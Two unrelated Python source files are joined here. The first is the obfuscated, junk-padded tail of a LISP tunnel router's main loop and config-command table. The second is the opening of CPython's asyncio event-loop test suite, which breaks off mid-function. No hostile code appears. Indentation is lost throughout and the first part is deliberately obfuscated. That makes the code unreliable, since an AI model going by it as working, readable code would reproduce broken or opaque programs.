if 68 - 68: I1IiiI % IiII - IiII / I1IiiI + I1ii11iIi11i - Oo0Ooo
if 65 - 65: ooOoO0o - i1IIi
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
lisp . lisp_ipc_write_xtr_parameters ( lisp . lisp_debug_logging ,
lisp . lisp_data_plane_logging )
return
if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
if 64 - 64: i1IIi
if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
if 25 - 25: II111iiii / OoO0O00
if 64 - 64: O0 % ooOoO0o
iI1111i = {
"lisp xtr-parameters" : [ O00Ooo , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"dynamic-eid-device" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-resolver" : [ ooOOO00oOOooO , {
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"dns-name" : [ True ] ,
"address" : [ True ] } ] ,
"lisp map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"send-map-request" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp rtr-map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"lisp database-mapping" : [ i11 , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp glean-mapping" : [ O0O0O , {
"instance-id" : [ False ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc-prefix" : [ True ] ,
"rloc-probe" : [ True , "yes" , "no" ] ,
"igmp-query" : [ True , "yes" , "no" ] } ] ,
"show rtr-rloc-probing" : [ iiI1I11i1i , { } ] ,
"show rtr-keys" : [ o00oOO0 , { } ] ,
"show rtr-map-cache" : [ O00oooo0O , { } ] ,
"show rtr-map-cache-dns" : [ Ii1IOo0o0 , { } ]
}
if 39 - 39: I1Ii111 % OoooooooOO - II111iiii % OoOoOO00 + oO0o + O0
if 14 - 14: OoooooooOO . o0oOOo0O0Ooo . I11i
if 50 - 50: ooOoO0o * OoOoOO00 + I1ii11iIi11i - i11iIiiIii + Oo0Ooo * I1ii11iIi11i
if 20 - 20: I1Ii111 / o0oOOo0O0Ooo % OoOoOO00
if 69 - 69: I1Ii111 - i1IIi % iII111i . OOooOOo - OOooOOo
if 65 - 65: OOooOOo + II111iiii
def Oo0O0OO0OoO0 ( lisp_socket ) :
if 26 - 26: OOooOOo * Oo0Ooo
if 31 - 31: I11i * oO0o . Ii1I
if 35 - 35: I11i
if 94 - 94: ooOoO0o / i11iIiiIii % O0
O0oO0oo0O , OOOo , OoOO , Ooooo00o0OoO = lisp . lisp_receive ( lisp_socket , False )
oooOOO0ooOoOOO = lisp . lisp_trace ( )
if ( oooOOO0ooOoOOO . decode ( Ooooo00o0OoO ) == False ) : return
if 68 - 68: O0
if 76 - 76: I1ii11iIi11i
if 99 - 99: o0oOOo0O0Ooo
if 1 - 1: Ii1I * OoOoOO00 * OoO0O00 + Oo0Ooo
if 90 - 90: I1Ii111 % Oo0Ooo - Oo0Ooo . iIii1I11I1II1 / OOooOOo + I11i
oooOOO0ooOoOOO . rtr_cache_nat_trace ( OOOo , OoOO )
if 89 - 89: oO0o
if 87 - 87: iII111i % Oo0Ooo
if 62 - 62: OoO0O00 + ooOoO0o / iII111i * i11iIiiIii
if 37 - 37: iII111i
if 33 - 33: OoO0O00 - O0 - OoO0O00
if 94 - 94: IiII * I11i * OoooooooOO / o0oOOo0O0Ooo . IiII - o0oOOo0O0Ooo
if 13 - 13: OOooOOo / IiII - OoO0O00 / OOooOOo . i1IIi
if ( iIIi1Ii1III ( ) == False ) :
lisp . lprint ( "lisp_rtr_startup() failed" )
lisp . lisp_print_banner ( "RTR abnormal exit" )
exit ( 1 )
if 22 - 22: O0 - I11i + I1Ii111 . Ii1I * i1IIi
if 26 - 26: iIii1I11I1II1 * o0oOOo0O0Ooo . I11i
I11III11III1 = [ II1Ii1iI1i , Oo0oO0oo0oO00 ,
i111I , oO0oIIII ]
oooOoO00OooO0 = [ II1Ii1iI1i ] * 3
if 98 - 98: OOooOOo + Ii1I
while ( True ) :
try : OOOO , IIIIiI11Ii1i , i1I11IiI1iiII = select . select ( I11III11III1 , [ ] , [ ] )
except : break
if 100 - 100: iII111i + I11i + ooOoO0o + iII111i / i1IIi
if 74 - 74: O0 % OoooooooOO * Oo0Ooo + OOooOOo * iII111i
if 100 - 100: OOooOOo + Ii1I * o0oOOo0O0Ooo + II111iiii
if 70 - 70: Oo0Ooo * iIii1I11I1II1
if ( lisp . lisp_ipc_data_plane and i111I in OOOO ) :
lisp . lisp_process_punt ( i111I , II1iII1i ,
iiI1iIiI )
if 76 - 76: iII111i % OoOoOO00 % iIii1I11I1II1 . OOooOOo
if 30 - 30: i1IIi
if 75 - 75: I11i . OOooOOo - iIii1I11I1II1 * OoO0O00 * iII111i
if 93 - 93: ooOoO0o
if 18 - 18: ooOoO0o
if ( oO0oIIII in OOOO ) :
Oo0O0OO0OoO0 ( oO0oIIII )
if 66 - 66: oO0o * i11iIiiIii + OoOoOO00 / OOooOOo
if 96 - 96: OOooOOo + OOooOOo % IiII % OOooOOo
if 28 - 28: iIii1I11I1II1 + OoOoOO00 . o0oOOo0O0Ooo % i11iIiiIii
if 58 - 58: I11i / OoooooooOO % oO0o + OoO0O00
if 58 - 58: O0
if ( II1Ii1iI1i in OOOO ) :
O0oO0oo0O , OOOo , OoOO , Ooooo00o0OoO = lisp . lisp_receive ( oooOoO00OooO0 [ 0 ] ,
False )
if ( OOOo == "" ) : break
if ( lisp . lisp_is_rloc_probe_request ( Ooooo00o0OoO [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe request, using pcap" )
continue
if 91 - 91: iII111i / I1ii11iIi11i . iII111i - o0oOOo0O0Ooo + I1ii11iIi11i
if ( lisp . lisp_is_rloc_probe_reply ( Ooooo00o0OoO [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe reply, using pcap" )
continue
if 72 - 72: Ii1I . IiII * I1ii11iIi11i / I1ii11iIi11i / iII111i
lisp . lisp_parse_packet ( oooOoO00OooO0 , Ooooo00o0OoO , OOOo , OoOO )
if 13 - 13: i1IIi
if 17 - 17: i11iIiiIii * o0oOOo0O0Ooo * o0oOOo0O0Ooo + OoO0O00
if 95 - 95: I1IiiI
if 95 - 95: OOooOOo % I1ii11iIi11i + o0oOOo0O0Ooo % ooOoO0o
if 36 - 36: O0 / i1IIi % II111iiii / iII111i
if 96 - 96: Oo0Ooo / oO0o . II111iiii . Oo0Ooo
if ( Oo0oO0oo0oO00 in OOOO ) :
O0oO0oo0O , OOOo , OoOO , Ooooo00o0OoO = lisp . lisp_receive ( Oo0oO0oo0oO00 , True )
if 91 - 91: II111iiii . OOooOOo + o0oOOo0O0Ooo
if ( OOOo == "" ) : break
if 8 - 8: OOooOOo * Oo0Ooo / iII111i - OoO0O00 - OoooooooOO
if ( O0oO0oo0O == "command" ) :
if ( Ooooo00o0OoO == "clear" ) :
lisp . lisp_clear_map_cache ( )
continue
if 100 - 100: oO0o . iIii1I11I1II1 . iIii1I11I1II1
if ( Ooooo00o0OoO . find ( "clear%" ) != - 1 ) :
lispconfig . lisp_clear_decap_stats ( Ooooo00o0OoO )
continue
if 55 - 55: oO0o
lispconfig . lisp_process_command ( Oo0oO0oo0oO00 , O0oO0oo0O ,
Ooooo00o0OoO , "lisp-rtr" , [ iI1111i ] )
elif ( O0oO0oo0O == "api" ) :
lisp . lisp_process_api ( "lisp-rtr" , Oo0oO0oo0oO00 , Ooooo00o0OoO )
elif ( O0oO0oo0O == "data-packet" ) :
IIIii ( Ooooo00o0OoO , "" )
else :
if ( lisp . lisp_is_rloc_probe_request ( Ooooo00o0OoO [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe request, using pcap" )
continue
if 37 - 37: IiII / i11iIiiIii / Oo0Ooo
if ( lisp . lisp_is_rloc_probe_reply ( Ooooo00o0OoO [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe reply, using pcap" )
continue
if 97 - 97: I1Ii111 . I11i / I1IiiI
lisp . lisp_parse_packet ( II1iII1i , Ooooo00o0OoO , OOOo , OoOO )
if 83 - 83: I11i - I1ii11iIi11i * oO0o
if 90 - 90: Oo0Ooo * I1IiiI
if 75 - 75: I1ii11iIi11i - OoOoOO00 * i11iIiiIii . OoooooooOO - Oo0Ooo . I11i
if 6 - 6: I11i * oO0o / OoooooooOO % Ii1I * o0oOOo0O0Ooo
OoIi1I1I ( )
lisp . lisp_print_banner ( "RTR normal exit" )
exit ( 0 )
if 28 - 28: IiII * I1IiiI % IiII
if 95 - 95: O0 / I11i . I1Ii111
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
test_events.py
|
"""Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
from test.support import ALWAYS_EQ, LARGEST, SMALLEST
def tearDownModule():
asyncio.set_event_loop_policy(None)
def broken_unix_getsockname():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform.startswith("aix"):
return True
elif sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
async def coro1():
await asyncio.sleep(0)
async def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
async def cb():
self.loop.stop()
await asyncio.sleep(0.1)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_run_in_executor_cancel(self):
called = False
def patched_call_soon(*args):
nonlocal called
called = True
def run():
time.sleep(0.05)
f2 = self.loop.run_in_executor(None, run)
f2.cancel()
self.loop.close()
self.loop.call_soon = patched_call_soon
self.loop.call_soon_threadsafe = patched_call_soon
time.sleep(0.4)
self.assertFalse(called)
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.create_server(('127.0.0.1', 0), backlog=1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread, timeout=1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = test_utils.simple_server_sslcontext()
client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
async def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
unique_hosts = set(hosts)
if family == socket.AF_INET:
